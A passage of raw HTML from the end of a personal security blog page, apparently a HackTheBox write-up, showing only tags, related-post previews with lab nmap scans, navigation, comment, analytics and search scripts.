href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-openadmin/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 1, 2021 <i class="unloaded">2021-01-01T23:21:04+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - OpenAdmin</h3><div class="text-muted small"><p> Foothold nmap scan $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN OpenAdmin-full-port-scan.txt 10.10.10.171 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0....</p></div></div></a></div><div class="card"> <a href="/posts/htb-traverxec/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 2, 2021 <i class="unloaded">2021-01-02T16:37:46+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Traverxec</h3><div class="text-muted small"><p> Foothold nmap scan $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Traverxec-full-port-scan.txt 10.10.10.165 Nmap scan report for 10.10.10.165 Host is up (0.10s latency). Not shown: 65533 f...</p></div></div></a></div><div class="card"> <a href="/posts/htb-blocky/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 22, 2020 <i class="unloaded">2020-12-22T00:17:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Blocky</h3><div class="text-muted small"><p> Foothold Nmap scan (open ports) $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Blocky-full-port-scan.txt 10.10.10.37 Nmap scan report for 10.10.10.37 Host is up (0.12s latency). Not shown:...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/htb-traverxec/" class="btn btn-outline-primary"><p>HackTheBox - Traverxec</p></a> <a href="/posts/htb-legacy/" class="btn btn-outline-primary"><p>HackTheBox - Legacy</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//amirr0r-github-io.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://amirr0r.github.io/posts/htb-sunday/'; this.page.identifier = '/posts/htb-sunday/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://github.com/amirr0r">amirr0r</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://amirr0r.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
